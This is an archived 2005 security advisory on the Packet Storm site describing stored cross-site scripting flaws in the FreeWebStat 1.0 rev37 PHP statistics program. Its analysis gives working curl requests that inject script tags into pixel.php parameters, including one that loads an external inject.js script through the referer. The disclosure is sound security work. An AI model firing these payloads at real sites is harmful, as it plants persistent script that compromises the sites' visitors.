exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

FreeWebStat Multiple Cross Site Scripting

FreeWebStat Multiple Cross Site Scripting
Posted Dec 1, 2005
Authored by Francesco Ongaro | Site ush.it

FreeWebStat version 1.0 rev37 is vulnerable to multiple cross site scripting flaws.

tags | advisory, xss
SHA-256 | 0020303ba5ebcc0da8d674752ec0c2c826555fce3288cdd245981ad3915983ad

FreeWebStat Multiple Cross Site Scripting

Change Mirror Download
FreeWebStat Multiple XSS Vulnerabilities

Name Multiple XSS Vulnerabilities in FreeWebStat
Systems Affected FreeWebStat (verified on 1.0 rev37)
Severity Medium Risk
Vendor www.freewebstat.com
Advisory http://www_ush_it/2005/11/25/free-web-stat/
Author Francesco "aScii" Ongaro (ascii at katamail . com)
Date 20051125

I. BACKGROUND

FreeWebStat is a PHP stats program, more information is
available at the vendor site.

II. DESCRIPTION

FreeWebStat 1.0 rev37 (the last version at the write time)
is vulnerable to multiple XSS. The impact is a little bugger
since datas will be stored to file and the result of a single
query will persist for some time on the backend. A well-timed
loop of requests will assure the XSS to be permanent.

We issued an advisory for an other application of the same
author called "Php Web Statistik Multiple Vulnerabilities"
who said "new version with all fixed bugs can be found
under www.freewebstat.com". Well, we downloaded this version
and seen the same type of vulnerabilities..

The old advisory:
http://www_ush_it/2005/11/19/php-web-statistik/

III. ANALYSIS

This vulnerability can be exploited by a GET query.

1) logdb.html XSS

logdb.html is vulnerable to JS injection using
anti-escape methods (eg: single quotes will be stripped
but there are a lot of working workrounds for this)

1.1) Curl the pixel.php

curl "http://local.asciistation.zapto.org/fws/pixel.php
?domain=<script>alert(1)</script>
&site=<script>alert(2)</script>
&jsref=<script>alert(3)</script>
&jsres=<script>alert(4)</script>
&jscolor=<script>alert(5)</script>"
-A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"
-e "http://www_ush_it"

$site, $jsref, &jsres and $jscolor are vulnerable.

Loading an url in $jsref will give you a full link (if the logdb.html
page have any pr you can drain some of it.

1.2) Call stats.php

This will generate the new logdb.html file.

1.3) Visit logdb.html

You will see some alerts. : )

The order with the example query is 2 3 2 3 4 5.

1.4) Some test curls

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
domain=ush.it&site=<script>alert(123)&jsref=1024x768
&jsres=1337&jscolor=red" -e "http://www.google.it/search?q=
lello+splendor++&hl=it&lr=&start=10&sa=N" -A "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
domain=ush.it&site=aa&jsref=http://ww.tin.it&jsres=1337&jscolor=red"
-e "http://www.google.it/search?q=lello+splendor++&hl=it&lr=&start=
10&sa=N" -A "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; (R1 1.3))"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
domain=ush.it&site=aa&jsref=http://ww.tin.it&jsres=13
37&jscolor=red" -e "http://www.suma.it/" -A "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
domain=<script>alert(1)</script>&site=
<script>alert(2)&jsref=</script><script>alert(3)</script>
&jsres=<script>alert(4)</script>&jscolor=
<script>alert(5)</script>"
-A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"
-e "http://www_ush_it"

2) stat.php search key XSS

2) Detecting the search key XSS

- if ( !in_array ( $logfile_entries [ 2 ] , $ip_archive ) )
+ if (TRUE)

# save the referer except the own domain name.
if the browser value is empty, do not save
+ echo "DEBUG<h1>".$logfile_entries [ 7 ]."</h1>";
if ( ( strpos ( $logfile_entries [ 7 ] , $exception_domain )
=== FALSE ) && ( trim ( $logfile_entries [ 7 ] ) != "" ) )

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=ush.it&
site=aa&jsref=sukasuka&jsres=1337&jscolor=red"

Will display as many "DEBUG sukasuka" under the header and over the
"summary" as the number of new queries.

# save the referer except the own domain name.
if the browser value is empty, do not save
if ( ( strpos ( $logfile_entries [ 7 ] , $exception_domain )
=== FALSE ) && ( trim ( $logfile_entries [ 7 ] ) != "" ) )

$logfile_entries[7] is the $jsref variable.

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
site=&jsres=&jscolor=&jsref=ssss&domain="

search words ( 1 ) lello splendor 100 % 1
search engines ( 1 ) Google 100 % 1

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
site=&jsres=&jscolor=&jsref=http://www.google.it/search?
q=lello+splendor++&hl=it"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
site=&jsres=&jscolor=&jsref=http://www.google.it/search?
q=<script>alert(123456789)</script>++&hl=it"

Now the injection is executed in 2 points, the referer table and the keyword
table.

2.2) Exploiting the search key XSS

stat.php give us some tricks, and we are evil. The string will be
lowered and any + or - char will became a (real, not a %20) space.

$terms = str_replace( '\"', "", $terms ); # delete \"
$terms = strtolower( $terms ); # string to lower

$terms = str_replace( "+" , " ", $terms ); # replace + with space
$terms = str_replace( "-" , " ", $terms ); # replace - with space

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?site=
&jsres=&jscolor=&jsref=http://www.google.it/search?
q=ppoopp<script language="javascript"-src=
"http://local.asciistation.zapto.org/fws/inject.js"></script>&hl=it"

IV. DETECTION

FreeWebStat 1.0 rev37 is vulnerable.
Older version not verified.

V. WORKAROUND

Input validation will fix the vulnerability.

VI. VENDOR RESPONSE

Vendor will fix and release a new version.

VII. CVE INFORMATION

No CVE at this time.

VIII. DISCLOSURE TIMELINE

20051125 Bug discovered
20051125 Developer notification
20051125 Advisory released
20051128 Vendor response

IX. CREDIT

ascii is credited with the discovery of this vulnerability.

X. LEGAL NOTICES

Copyright (c) 2005 Francesco "aScii" Ongaro

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close